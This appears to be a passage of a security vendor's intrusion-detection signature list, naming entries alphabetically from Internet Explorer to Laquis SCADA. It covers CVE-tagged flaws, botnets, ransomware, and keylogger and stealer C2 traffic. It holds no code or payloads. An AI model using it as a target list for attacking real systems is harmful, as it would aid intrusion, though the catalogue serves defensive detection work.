Internet-Explorer-MSHTML.DLL-Parsing-DoS
Internet-Explorer-OutlookExpress.AddressBook-DoS
Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618
Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619
Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653
Internet-Explorer-Same-Origin-Policy-Bypass
Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053
Internet-Explorer-Scroll-Event-Remote-Code-Execution
Internet-Explorer-Security-Zone-Bypass-Url-Spoofing
Internet-Explorer-toStaticHTML-Cross-Site-Scripting
Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
Internet-Explorer-Uninitialized-Parameter-DoS
Internet-Explorer-Use-After-Free-CVE-2012-4787
Internet-Explorer-Use-After-Free-CVE-2012-4792
Internet-Explorer-Use-After-Free-CVE-2013-0025
Internet-Explorer-Use-After-Free-CVE-2013-0026
Internet-Explorer-Use-After-Free-CVE-2013-0029
Internet-Explorer-Use-After-Free-CVE-2013-0087
Internet-Explorer-Use-After-Free-CVE-2013-0088
Internet-Explorer-Use-After-Free-CVE-2013-0090
Internet-Explorer-Use-After-Free-CVE-2013-0091
Internet-Explorer-Use-After-Free-CVE-2013-0092
Internet-Explorer-Use-After-Free-CVE-2013-0093
Internet-Explorer-Use-After-Free-CVE-2013-0094
Internet-Explorer-Use-After-Free-CVE-2013-1288
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-2551
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3110
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3111
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3112
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3116
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3117
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3118
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3119
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3120
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3121
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3122
Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3142
Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030
Internet-Explorer-Vulnerability-CVE-2016-0002
Internetoptimizer
Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666
Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768
Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665
Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667
Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680
Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763
Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884
Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794
Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752
Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753
Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411
Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968
Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419
Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824
Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832
Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833
Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847
Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448
Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920
Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238
Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239
Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216
Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230
Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035
Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060
Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062
Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213
Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214
Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674
Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260
InterScan-VirusWall-Directory-Traversal
Intersystems-Cache-DoS-1
Intersystems-Cache-DoS-2
Invalid-Base64-Cookie
Invalid-Basic-Authentication-Base64
Invalid-HTTP-Response
Invensys-Wonderware-SCADA-ActiveX-Buffer-Overflow-Vulnerability
Invisible-Inline-Frame
Invision-Power-Board-Index-Php-SQL-Injection
Invision-Power-Board-PHP-Remote-Code-Execution
Invisionix-IRSR-Remote-PHP-Inclusion
InvokeAI-RCE
IOServer-Directory-Traversal
IOServer-OPC-Server-DoS
IP-Address-As-HTTP-Host
IP-Bonk-IP-Fragmentation-Denial-Of-Service
IP-Cisco-Malformed-Packet-IP-Phone-Crash
IP-ICMP-1234.c-DoS
IP-Land-DoS
IP-Land-DoS-Cisco-Catalyst
IP-Land-DoS-Linksys
IP-Land-DoS-Motorola
IP-Land-DoS-Scientific-Atlanta-Cable-Modem
IP-Land-DoS-Westell-Versalink
IP-Nestea-IP-Fragmentation-Denial-Of-Service
IP-Newtear-IP-Fragmentation-Denial-Of-Service
IP-Oshare-Bogus-IP-Fragmentation-DoS
IP-Teardrop-DoS
IP-UDP-Saihyousen-Denial-Of-Service
IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection
IPFire-Pakfire.cgi-Authenticated-RCE
IPFire-Proxy.cgi-RCE
IPFire-Proxy.cgi-Remote-Code-Execution
Ipswitch-IMail-IMAP-Server-Delete-Command-BOF
Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
Ipswitch-IMail-List-Mailer-Reply-To-Address-Buffer-Overflow
Ipswitch-IMail-Server-Imailsec.dll-Heap-Buffer-Overflow
Ipswitch-IMail-Server-IMAP-Examine-BOF
Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF
Ipswitch-IMail-SMTP-Server-Content-Type-Header-Buffer-Overflow
Ipswitch-IMail-StartTLS-Plaintext-Command-Injection
Ipswitch-WhatsUp-Gold-HTTP-Request-DoS
Ipswitch-WhatsUp-Gold-SNMP-Trap-Cross-Site-Scripting-CVE-2015-6005
Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal
Ipswitch-WS_FTP-Client-Format-String-Vulnerability
Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service
Ipswitch-WS_FTP-Server-Command-Buffer-Overflow
ipTime-G104BE-Router-Code-Execution
IPv6-Land-DoS
IPv6-Solaris-Malformed-Packet-DOS
IRC-Itlebot-Malware
IRC-Network-Usage
IRC-Scan-Activity
Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow
IRIX-lpsched-Command-Execution
IRIX-Telnetd-Format-String
ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service
ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service
ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service
ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service
Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service
ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service
ISC-Bind-Dname-Response-Processing-Denial-Of-Service
ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service
ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service
ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service
ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service
ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service
ISC-BIND-DNSSEC-Validation-Denial-Of-Service
ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service
ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
ISC-Bind-Edns-Option-Processing-Denial-Of-Service
ISC-BIND-Invalid-DNS-Key-Record
ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
Isc-Bind-Openpgpkey61c-Denial-Of-Service
ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service
ISC-BIND-Query_addsoa-Denial-Of-Service
ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
Isc-Bind-Recursive-Resolver-Resource-Consumption-Denial-Of-Service
Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service
ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service-CVE-2017-3138
Isc-Bind-RPZ-Query-Processing-Denial-Of-Service
ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service
ISC-BIND-RRSIG-RRsets-Denial-Of-Service
ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS
ISC-BIND-TKEY-Queries-Input-Validation-DoS
ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write
ISC-BIND-Truncated-Tsig-Record
ISC-Bind-Tsig-Validation-Denial-Of-Service
ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
ISC-DHCP-Buffer-Overflow
ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow
ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service
ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference
ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow
ISC-DHCP-Server-Omapi-Denial-Of-Service
Isc-DHCP-Server-Packet-Processing-Denial-Of-Service
Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service
iSCSI-target-Multiple-Implementations-Buffer-Overflow
iSCSI-target-Multiple-Implementations-Format-String-Code-Execution
Iseemedia-LPViewer-ActiveX-Control-Multiple-Buffer-Overflows
ISO-MPEG-4-Media-Content
ISPConfig-Remote-Command-Execution
ISPConfig-User_settings.php-Arbitrary-File-Inclusion
ISR-Stealer-C2-Traffic
ISS-PAM-ICQ-Parsing-BOF
ISTBar-Internet-Explorer-Toolbar
ITHouse-Mail-Server-RCPT-To-BOF
itok-Token-SQL-Injection
ITS-SCADA-SQL-Injection
Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization
Ivanti-Avalanche-Copyfile-Directory-Traversal
Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization
Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload
Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection
Ivanti-Avalanche-Enterpriseserver-Getprofileapplicationdata-SQL-Injection
Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection
Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass
Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection
Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection
Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass
Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass
Ivanti-Avalanche-Extractzipentry-Directory-Traversal
Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload
Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload
Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload
Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload
Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal
Ivanti-Avalanche-Imagefilepath-Directory-Traversal
Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization
Ivanti-Avalanche-Notification-Server-Insecure-Deserialization
Ivanti-Avalanche-Path-Traversal-CVE-2023-41474
Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection
Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal
Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass
Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal
Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection
Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal
Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass
Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass
Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection
Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal
Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization
Ivanti-Avalanche-Validateamcwsconnection-Server-Side-Request-Forgery
Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization
Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass
Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow
Ivanti-Avalanche-Wlavalancheservice.exe-TV_FN-Infinite-Loop
Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference
Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow
Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference
Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow
Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow
Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read
Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection
Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass
Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190
Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380
Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963
Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection
Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908
Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection
Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404
Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805
Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457
Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
Ivanti-Connect-Secure-Command-Injection-Vulnerability-CVE-2024-21887
Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282
Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773
Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-10811
Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13159
Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13160
Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13161
Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330
Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal
Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal
Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection
Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection
Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection
Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection
Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection
Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078
Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781
Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection
Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection
Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection
Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection
Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection
Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection
Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection
Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection
Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection
Ivanti-EPM-Agent-Portal-Command-Execution
Ivanti-EPM-RecordGoodApp-SQLi-RCE
Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035
Ivanti-Virtual-Traffic-Manager-Authentication-Bypass-CVE-2024-7593
Jaff-Ransomware
Jana-HTTP-Server-Msdos-Device-Name-DoS
Jason-Maloneys-Cgi-Guestbook-Command-Execution
Jasper-Jp2_Decode-Out-Of-Bounds-Read
JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430
JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809
Java-Archive-File-Upload
Java-Color-Management-Component-Remote-Code-Execution
Java-Deserialization-Privilege-Escalation
Java-MixerSequencer-Buffer-Overflow
Java-Related-File-Transfers
Java-Rmi-Remote-Command-Execution
Java-Runtime-Environment-JAX-WS-Remote-Code-Execution
Java-Runtime-Environment-Remote-Code-Execution
Java-Trusted-Method-Chain-Privilege-Escalation
Java-Unsigned-Applet-Execution
JavaScript-Create-Noscript-Element
JavaScript-In-OLE
JavaScript-In-PDF
JavaScript-Obfuscated-With-Hangul-Filler-Characters
JavaScript-Obfuscation
JavaScript-ShellCode-Generation
JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
JavaScript-Suspicious-Function-Name
JavaScript_Injected-Wordpress
JAWS-Command-Execution
Jboss-Authentication-Bypass
Jboss-EAP/AS-Remoting-Unified-Invoker-RCE
Jboss_Seam_2_Code_Injection
Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting
Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting
Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery
Jenkins-Arbitrary-File-Read-CVE-2024-23897
Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting
Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting
Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting
Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting
Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting
Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization
Jenkins-Ci-Server-Getorcreate-Policy-Bypass
Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting
Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution
Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read
Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery
Jenkins-Ci-Server-Xstream-Insecure-Deserialization
Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting
Jenkins-CLI-Deserialization
Jenkins-CLI-Rmi-Java-Deserialization
Jenkins-Config-File-Provider-Plugin-External-Entity-Injection
Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898
Jenkins-Core-Fileparametervalue-Directory-Traversal
Jenkins-Core-JSON-Lib-Denial-Of-Service
Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting
Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting
Jenkins-CVS-Plugin-Cross-Site-Request-Forgery
Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting
Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting
Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write
Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection
Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection
Jenkins-Git-Client-Remote-Command-Execution
Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting
Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting
Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting
Jenkins-Nuget-Plugin-External-Entity-Injection
Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting
Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting
Jenkins-Plugin-Resources-Directory-Traversal
Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
Jenkins-Repository-Connector-Plugin-Stored-Cross-Site-Scripting
Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting
Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029
Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting
Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting
Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection
Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal
Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting
Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861
Jenkins-Urltrigger-Plugin-External-Entity-Injection
JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793
JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198
JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Backup-Directory-Traversal
JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting
JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917
JetBrains-TeamCity-Path-Traversal-CVE-2024-27199
JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039
JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting
JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting
Jetty-File-Disclosure-CVE-2021-28169
Jetty-Web-INF-File-Disclosure
Jimcrat-Remote-Access-Tool
Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450
JNDI-Exploit-Kit-Traffic
Johnson-Controls-CK720-Commands
Joizeparc-Botnet
Joltid-Peerenabler
Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities
Joomla!-CMS-User-Notes-List-View-SQL-Injection
Joomla!-CMS-Webservice-Authentication-Bypass
Joomla-Akeeba-Kickstart-Remote-Code-Execution
Joomla-Arbitrary-File-Upload
Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting
Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting
Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting
Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting
Joomla-Com_Fields-SQL-Injection
Joomla-Content-History-SQL-Injection
Joomla-JoomlaWorks-AllVideos-Directory-Traversal-Disclosure
Joomla-Remote-Code-Execution-Vulnerability
Joomla-TinyBrowser-File-Upload-Code-Execution
Joomla-TinyMCE-File-Upload-Remote-Code-Execution
Joomla-Webring-Remote-File-Include-Vulnerability
Joplin-Mdtohtml-Cross-Site-Scripting
Jorani-Unauthenticated-Remote-Code-Execution
JPEG_Data-After-End-Of-Image-Marker
JPG-Gdiplus-DLL-Comment-Buffer-Overflow
jQuery-Cross-Site-Scripting-CVE-2020-11023
JSFuck-JavaScript-Obfuscation
JSON-Object-With-Unnecessarily-Escaped-Characters
Judge0-Sandbox-Escape-CVE-2024-28189
Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
Junos-OS-J-Web-Arbitrary-File-Upload-CVE-2023-36846
Junos-OS-J-Web-PHP-External-Variable-Modification-CVE-2023-36845
Junos-OS-Local-File-Inclusion-CVE-2022-22246
Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245
Junos-OS-Phar-File-Deserialization-CVE-2022-22241
Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242
Kafka-UI-Remote-Code-Execution-CVE-2023-52251
KaiXin-Exploit-Kit
Kaltura-getUserzoneCookie-Code-Execution
Kaltura-Remote-PHP-Code-Execution
Kame-Ike-Racoon-Hash
Kame-Racoon-X509-Certificate-Verification
Karjasoft-Sami-FTP-Server-2.0.1-Username-Buffer-Overflow
Karjasoft-Sami-FTP-Server-2.0.2-Username-Buffer-Overflow
Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow
Kaseya-VSA-Arbitrary-File-Upload
Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362
Kaskad-Dasever-Heap-Overflow
Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal
Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation
Katello-Update-Roles-Missing-Authorization
Keenvalue
Kelihos-Botnet
Kemoge-Botnet
Kentico-CMS-Staging-SyncServer-Remote-Command-Execution
Kerberos-Authentication-Failed
Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
Kerio-Control-Crlf-Injection-CVE-2024-52875
Kerio-Personal-Firewall-Buffer-Overflow
KeyBase-Keylogger-C2-Traffic
Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal
Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal
Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization
Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection
Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution
KillDisk-Binary-File
Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
Kingsoft-Writer-Font-Names-Buffer-Overflow
Kinsing-Linux-Trojan-Infection-Traffic
Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection
Known-APT-Traffic
Known-Phishing-Word-Documents
Knox-Arkeia-Network-Backup-Server-Type77-Stack-BOF
Kodi-Local-File-Inclusion
Kong-Gateway-Admin-API-Remote-Code-Execution
Konica-Minolta-FTP-Utility-Directory-Traversal
Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS
Konqueror-Same-Origin-Policy-Bypass
Koobface-Bot
Korenix-Jetwave-Command-Injection-CVE-2023-23294
KPOT-Stealer-Traffic
Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064
Kronos-Botnet
Ksmbd-Tools-Ksmbd.Mountd-Ndr_write_bytes-Heap-Buffer-Overflow
Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation
Kubernetes-Authenticated-Code-Execution
Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure
LabStore-SQL-Injection
Labview-Web-Server-Denial-Of-Service
LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting
LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion
LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow
LANDesk-Management-Suite-Remote-File-Inclusion
LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal
LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion
Langflow-AI-RCE-CVE-2025-3248
Lansweeper-Assetactions-Directory-Traversal
Lansweeper-Assetactions-SQL-Injection
Lansweeper-Getassetsbygroupid-SQL-Injection
Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal
Lansweeper-Helpdesksetupactions-SQL-Injection
Lansweeper-Tickettemplateactions.aspx-Directory-Traversal
Lansweeper-Webuseractions-Stored-Cross-Site-Scripting
Lantronix-Premierwave-Command-Injection-CVE-2021-21881
Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write
Laquis-SCADA-LGX-Report-Arbitrary-File-Write
Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write
Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write
